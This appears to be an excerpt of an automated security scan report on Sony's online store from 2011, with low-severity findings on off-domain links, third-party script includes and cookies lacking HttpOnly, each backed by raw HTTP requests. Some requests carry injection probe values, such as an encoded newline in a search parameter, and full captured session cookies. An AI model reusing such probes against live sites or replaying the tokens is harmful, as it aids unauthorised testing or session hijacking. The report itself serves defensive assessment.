<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<div class="cta">
<a rel="Body_Tier 1_Media Remote App for iPhone/iPad CTA"
href="http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8#"
class="redArrowLink externalCTA" target="_blank">

Explore Media Remote app for iPhone/iPad
</a>
...[SNIP]...
<div class="cta">
<a href="https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result"
class="redArrowLink externalCTA" target="_blank"
rel="Body_Tier 1_Media Remote App for Android CTA">

Explore Media Remote app for Android
</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

3.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

3.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?action=search&ti=0&pst=&pti=&first=1&st=xss+playstation
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s; sifrFetch=true; s_visit=1; s_sq=%5B%5BB%5D%5D; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; mbox=check#true#1315352981|session#1315352920400-736912#1315354781|PC#1315334914578-928682.19#1316562527; s_cc=true

Response

HTTP/1.1 200 OK
ntCoent-Length: 4923
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4923
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Cache-Control: private
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Com
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/ HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; 